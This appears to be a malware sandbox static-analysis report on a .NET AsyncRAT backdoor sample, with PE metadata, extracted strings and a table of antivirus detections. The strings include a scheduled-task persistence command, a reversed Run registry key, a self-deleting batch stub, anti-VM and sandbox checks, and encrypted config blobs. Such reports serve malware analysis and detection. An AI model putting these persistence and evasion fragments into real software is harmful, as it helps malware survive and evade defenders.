Static | ZeroBOX

PE Compile Time

2023-10-17 06:40:53

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy
.text 0x00002000 0x0000b054 0x0000b200 5.61592415176
.rsrc 0x0000e000 0x000007ff 0x00000800 4.88506844918
.reloc 0x00010000 0x0000000c 0x00000200 0.0815394123432

Resources

Name | Offset | Size | Language | Sub-language | File type
RT_VERSION 0x0000e0a0 0x000002cc LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0000e36c 0x00000493 LANG_NEUTRAL SUBLANG_NEUTRAL exported SGML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
ToUInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
YjgDZUlCWorsQLA
RTuGgfawTwYYA
tKvOmTuqBZvLMScA
TgezzPuUnedtA
TadujiHrazZVqczA
StQNHnCEgRFB
xkxQjDUuLGzIB
ASAjpnvTQjrHXB
QUFWnkQYqjeB
aqMLSqTUpeB
pUDwvNroMhOgB
manAasvBhB
XChFYXqTzwUyB
YDlROtMjpzJC
PnkjslERLUC
lzYIfFOiwUC
ZkFfWcpkWolZC
bWdqqKVlCfrFoifC
qbwaMawbCOdpC
BOQmkpOlsC
CXffKDaAgltC
bUNzbCHAUhzC
iqHaGmnfoWsFCD
MapNameToOID
get_FormatID
CXbfJsignEBlSD
heEzdtufiTD
smMBajrrzsRgD
NIiZxyAUqifqD
OlpRaqbKmChwD
qsbyGyRXzuRPE
HZxMcfdGRE
EMAgGodoxHhRE
KkVClptTbFiE
mMfgHyarcdlqE
UZmISQeEnafOBF
KzANgjfFFBEtTEF
VuaEdzRgDEFwpNF
NUYdygFNyQF
eEaXBYueufIjF
YRkyGUIHanByF
lxhRNMSUkRXyF
bENjkosfUqaNpsyF
ioAmThMljleAG
FxerwMEdPASJkDG
NVxVjTAxbGJG
IQxcFbjolbOG
ytcdPKnLcXXlTG
qHnDJNWHEBAiFXG
eKotcyUKwlYG
MCMjEFOWYSuG
YVwwjBtZpLBmkVH
qNMXPKpUwlpH
hLEcGmdsxVrH
cJWIDYpaHuH
get_ASCII
mDqZFWLMMI
IeOSizdEkFsUnXQI
DEeXBwmzpsepCmI
ikEYIKyyovCJ
tnnQuWjPZIkkHJ
NlOBBKcKrmyPJ
OAPQtauNjoTJ
QwaTtRRArrOfJ
bIATPscjgzomJ
ZKISSuKLShoJ
jpiLgCDIwMtpJ
FHRiuOjcbRGDtJ
MXpqnqtTmjQGnVYGK
LbIXeXxQEONRIK
abieCPmLpRgOK
ZFADqGvNakYgWK
NDuLjxISUamK
WHgfwPydnK
iCmLuuCxeMODL
NLsdSlgrMTZPGL
ddycHBbnQWRRL
VawvkUSUgrjL
bhGNbbErArCVkL
wUeELJzpwL
PNVrhEXNvOAM
NaGWfyCYhIM
AajETBlwTrlMM
NxcMOJKOfbSM
hGYLipjqiXMbM
JwOwjTyhzOdM
dTZimtKqgM
GALWZeWfmxTwZlM
xdiverYJlorlM
fAGRmrMTYiSLHN
OWGIJcPaEhaLN
XRsqHMpdrZN
jruFQLPfjiN
tJcCYRUEoN
cHdGoxUGkmvN
wQtPUNWDEHlKOAO
BlqsQtjBotcDO
jXKqPqKoeHO
System.IO
hSxWCSdFfutZO
VOjEMVlVolEgO
JxFSWUaYwlwiO
REWqVuqgqYOujjO
JuubXWDmZmAkO
nnBQSonSyRqO
wrdEYWcquO
VuNEEciaZKLDP
NoAoWNlcOQLP
DYxhPuoHoitP
hWkFtxDGMBGptP
FPTNaruktpdrAQ
yaukojVmIQ
AMkoqXFCPnQ
oFvwhRwVUIR
LNMfFzoAfR
fmNilSRiEiR
EjfCAPhsQOijR
bPBMMZQDLwMqR
mHVvEUiDQtpvR
yaqNwqhSAS
IsmOMAyCwDSTDS
XqNEVSuTpUNS
idqmZSOUQS
sQChnQyUHwixTS
HjHotlZzSavLdXS
oRlsYgVoJYS
nrnogflFYngS
uaObbjYwciS
ojXoGshrRLYnmS
RHmRvxNGGXnS
omTQeXnpYwFQPvS
AaXOMOsZNNoaFT
qBgOJpETBnHT
frUnnhvRIfTNT
UnAoHQldMsEzGOT
XtNDhwWfzWT
YRqcKeJpkT
JtFPtFtZGuT
yopxDmmwvYAU
TKykALTggfU
lAPQpTQlwvU
fYuloiFNxDV
get_IV
set_IV
GenerateIV
osMvKGBMZyUbRV
kenUCJdSyJPiV
fUvpMFFLrTVGW
UICIiQiYXBCLJW
bgUxNJonWRW
wMEnfPlcPmVW
edyJASvDEZZMaW
SqDFNvywdjW
VFfvXyCmxrAdXqnW
rDXEtslFQPGCX
ckQuiNeWHGX
tPnWjMroqiGX
bPYRrUXNZDcxTX
uKWMNCXEbkX
FyspPXcXgrmxvX
OUaZAyBDcczX
AuYPnOMyiIIOJY
CjsfIJyrHjTNY
GeaTDxCsOrCYZY
axZMlSLrGQysY
ZsQYvUkZBgDVBZ
gCTlqFZeNyFirEZ
uIwcCyulaFtlsfFZ
zAfYDLkMRZ
KjmcpGLfPClZ
SzYIIgOnmxlZ
SVFssoVGFTjhzZ
value__
rieIJLDnFHEa
dGwzjfyOSlFOa
qSoXlpBTOa
whFGOdRLRxlqdInOa
hYSewhAsJLRjlPa
ehDooLcFnfya
OpFNAbCuEiWEBb
bqKHTWxYLaDb
CPcRkKiertHb
xcEIuZqvOaOCbTb
aSvVTigTAxDqab
pNKAnDSjtdb
mscorlib
sGtmcfVkSKaob
BSiDoOEWDpb
QObTMDEzSqb
aoddRNapZQbLMc
bnUZvUUnUc
LPwbkcWPkVmNLIXc
IixrGCrBrJzgc
System.Collections.Generic
Microsoft.VisualBasic
zrJtLhgtmiijc
ErQDJNJLqPkc
uxkbtSgLZXwmc
get_SendSync
uwErcxcTlRuhlxUuc
gCmVjwJAVkdwc
ZFPuHdsChwc
txsSbNLlQtxc
jiggVnrvYkaoOd
zAZdthHJoOPaXd
OPuzbBKnaXd
EndRead
BeginRead
Thread
QJrbBvgTbd
FelEgluvdd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
sZssVevzHBfd
SEtMjSbFGKgd
get_Guid
rerJnWBMRGekd
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
Append
RegistryValueKind
VePJWRwIrKkod
haTYmRUrJOGsd
WVeBzoTraQhnud
PdiiGVrIpqVTe
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
qrfGidkMeXxSpoje
Invoke
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
WriteLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
Dispose
StrReverse
X509Certificate
Create
SetThreadExecutionState
uanKzgmpvXvgYete
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
qZrMYCUlmwJTf
HICoxPFqtBmff
cakjUPvDWxKg
YoYcWtPGUbkHiPg
xgSKrruncg
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
set_ErrorDialog
oxaNmKtyIRxrg
UcmdhaTkWEqYryrg
lNOpHRimMJrsxg
pyuvWQSPgYBh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
get_Length
YPclscmmdkth
zhfeebQHQdAi
fZJRmHVSxOtGi
UHsdULiovKi
ShkropDsNDBQi
sYbwnmAlGHdi
ZIXZcmVOPdi
ZcBPqcGbioVJmbfli
CiKpbNnIyNri
EhuRUCvavGBj
WpgLERELDZCJKbUALj
AArtwpIqbXj
XZtqpBuveTuZj
UAimPKMMdj
BwbyutEMmj
oteiawUEEUtj
nGPolBAJOkwj
PoltSrEbdTk
GaXwwEaKYyXk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
RegistryKeyPermissionCheck
FlushFinalBlock
oMcwnmXBOsjk
NdIizLKaOGJPok
AkVNkotzRNqk
HwoigDrSBrk
raOpJHECXzk
NlXaClTzELLuKl
HVftfdYXLRl
PzFjXwnErAzGUl
eYAXOSZlaUwMWl
YVdUzQImZNgoAal
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
dZeZcHMpcdfSzfl
kernel32.dll
user32.dll
ntdll.dll
LepOapyiQcAml
hAZXFYGwCml
fHraumpsaBeVsl
ROSmLAEMGowJzXm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
get_Item
get_Is64BitOperatingSystem
zRYqfFnhCfm
ZlSEZgeHfm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
uFbyOtWLUvWim
Random
vTdMacGercqm
ICryptoTransform
qTCtHogNyqpxm
QdbyAYboRHoHn
NzBfbllHWVNn
mBcCwdryhSn
ToBoolean
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
xPumpujAdkvGlon
hETNYKCGoICo
gpdVphmOQhKbo
WDwtibUFdvdfo
ImageCodecInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
eNoUqjJVPho
Microsoft.CSharp
EWrrxNuprp
pjeDahkDotRup
NfcvlShoEzp
fsRspOGXYIazp
GqoPuEfvjFAHPGq
aWXVDltuoGq
zGJoidNpIlMJq
aqOaazhNLq
bmbbidTPgVq
fQazXGFbxjVwVq
vijxxaIQEOlq
System.Linq
MXcoUSvRTpBZpq
rdikZMyMJeLUtq
GDeEUFmDsesxyq
JqCOLxbytbHOFNXr
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
VrQaPLnMvZpr
IntPtr
HtwBNvsuhyNyr
cJmfMhZklzwCs
OyxtOoozecs
System.Diagnostics
eenPcUUXpcs
gHssNHqBmds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
ICredentials
set_Credentials
Equals
eiFMECKDjkls
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
VTDkbZBzIGws
CkNNzcdUKOVt
OFBYYnWEsAOWt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
Collect
Connect
arRIfABJxjacdt
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
vrDADmyFjt
IAsyncResult
ToUpperInvariant
WebClient
AsyncClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
iUmCykchvsUu
PoSVxwXIJXEWu
cluaBSqXyNTVgWu
EBNvJkZrau
OwvVPareBhrbu
jeenKmwycnu
lAbhQVWQDxIJwjou
arfDwhIRQbGRLqu
spPBLvJGAkFv
tJyTXVUCLuav
UYHLlUmKByxpdv
YaIQqFnOvnWAw
iqtufOhUWUMlAw
ncJnidQEOwFw
gvkFWdtqCSJOw
RHdYqekChVSmWw
ggmwzBMmhw
GetForegroundWindow
set_CreateNoWindow
WfsikKYeTPGxw
wfquPCCcYduAx
CexjhPtteLyQHx
VgsBIdyuIx
uVXJfFrambXx
BKAJskggGdXfdx
gRxJGXgmpvdx
GlstiuFfLjx
rjCpgRovCYqx
VpXOFdwtKfsx
uTfmguspeWJysx
unylzmiNjxx
HixAUHQhpxx
DmdPkadsATIEdUUDy
KPKhvGBeVQy
jaTDUQtcloyVy
InitializeArray
ToArray
get_AsArray
yHXuuBUATcy
ECkbNBfDdvebcy
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
RegistryKey
NCLkstLFTHHfy
System.Security.Cryptography
GzkRtUWHNHjy
EXjlrWGpPIhky
Assembly
AddressFamily
BlockCopy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
nfxzNBqXvy
MVhfyvYaPJaFhGuyy
GYXewhbIqiNPMBJDz
OhVCCGHloIueQHz
WyOVopsWSz
bVUYGLkPVz
wmixDuRQqbAHZz
QcyHrxjyDaz
eLQBwJZIMNhz
RSPNjQpHMHvIbrz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName.NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
eqybX9GcSKDe09CfDYRj1AnaXMqMHHGu2UzT1G2mkNoRCoY28vIN5c9kEIe9Q7xzmKdiKPOEb2o+av1SRymMsQ==
pT331GIOWS9mmcpQpJ4HI6DER8D0dY0A9aJKzX2oNsZktU8Dx/+SzbzVJgOIs7I6Cua9edO2ewCb7b+3syn7Iw==
M2swwoQa+9X1gLbkpibakuaChr1r8A5Sr8EAloCx/Rc+wSKp3juOX184eb1c13RkyoOKbWK4SV+VIbtrXVinFw==
m7nogV1tlYD8nhGL4NSrskHVTbyIk03kFfLqYLAmub6LSwqTl25Wy6NWPy+64jrSpAQBRxuz2xTss6TDunPDUg==
%AppData%
svchost.exe
OVdMUTlGcHZqZm5leUxqNEljZWxPMjd2QTFpb3pFZDU=
YpaBSTn0kAADkYdp8zSVNoBPGP9cYVway9qGA/qT1p20gQPHL2lXJB1xmDQ3oVko51VkTGgSWFx+lEQgtwoQ7g==
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
Wa6AwfyQ/D0mzNGPPtYI3a862fTvGvsYQGCrXBIE+cjxRsvyus6VBeH0kACBm1B1KvHINRRDJBLjnWsTgmQWsA==
mGmVclw/7J8tdQ/TrxM8cV2CEOTbXTq58hVGExCsXRz8gssHcJrE9Haa/pL9euEOVxiudZEQNXv9Y60cMAQBIg==
csTk97vQ6XDxVZioLxqZZfK396Eu4gvmiB+13cPi9DVosykaFVbA3AQJJaqDmYsqJih94NP+xCFUXop57o8NMQ==
d29oq2ypCo5TfEq9Ypq2ezvHlb96S5qIXobz7yvdNPX62YYuClEwH+BDi3O9CpYfZZRr0OtJ5fEFSgHLLuy2XQ==
Packet
Message
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Version
Performance
Pastebin
Antivirus
Installed
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
sendPlugin
Hashes
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus | Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.AsyncRat.m!c
tehtris Clean
ClamAV Win.Packed.Razy-9625918-0
CMC Clean
CAT-QuickHeal Trojan.IgenericFC.S14890850
Skyhigh BehavesLike.Win32.Fareit.pm
ALYac Gen:Trojan.Mardom.MN.12
Cylance Unsafe
Zillya Trojan.Agent.Win32.1339118
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan ( 005678321 )
Alibaba Backdoor:MSIL/AsyncRat.896cc5db
K7GW Trojan ( 005678321 )
Cybereason malicious.3f545f
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic Windows.Trojan.Asyncrat
ESET-NOD32 a variant of MSIL/AsyncRAT.A
APEX Malicious
Avast Win32:DropperX-gen [Drp]
Cynet Clean
Kaspersky HEUR:Backdoor.MSIL.Crysan.gen
BitDefender Gen:Trojan.Mardom.MN.12
NANO-Antivirus Clean
ViRobot Trojan.Win.Z.Mardom.48640.NP
MicroWorld-eScan Gen:Trojan.Mardom.MN.12
Tencent Trojan.Msil.Agent.zap
TACHYON Clean
Sophos Troj/AsyncRat-B
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.Siggen9.56514
VIPRE Gen:Trojan.Mardom.MN.12
TrendMicro Backdoor.MSIL.ASYNCRAT.SMXSR
McAfeeD ti!07D35C2C242D
Trapmine suspicious.low.ml.score
FireEye Generic.mg.67e32a73f545f56e
Emsisoft Gen:Trojan.Mardom.MN.12 (B)
SentinelOne Static AI - Malicious PE
GData MSIL.Trojan.PSE.1BITXMO
Jiangmin Backdoor.MSIL.gguk
Webroot W32.Trojan.Dropper
Varist W32/Samas.B.gen!Eldorado
Avira TR/Dropper.Gen
Antiy-AVL Clean
Kingsoft malware.kb.c.1000
Gridinsoft Trojan.Win32.Agent.sa
Xcitium Clean
Arcabit Trojan.Mardom.MN.12
SUPERAntiSpyware Trojan.Agent/Gen-Kryptik
ZoneAlarm HEUR:Backdoor.MSIL.Crysan.gen
Microsoft Backdoor:MSIL/AsyncRat.AD!MTB
Google Detected
AhnLab-V3 Trojan/Win32.RL_Generic.R358277
Acronis Clean
McAfee Fareit-FZT!67E32A73F545
MAX malware (ai score=81)
VBA32 OScope.Backdoor.MSIL.Crysan
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/CI.A
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.AntiVM!1.CF63 (CLASSIC)
Yandex Clean
Ikarus Backdoor.AsyncRat
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Agent.CFQ!tr
BitDefenderTheta Gen:NN.ZemsilF.36810.cm0@aOPFjgo
AVG Win32:DropperX-gen [Drp]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Backdoor[rat]:MSIL/Agenttesla.Stub.LQL!MTB
No IRMA results available.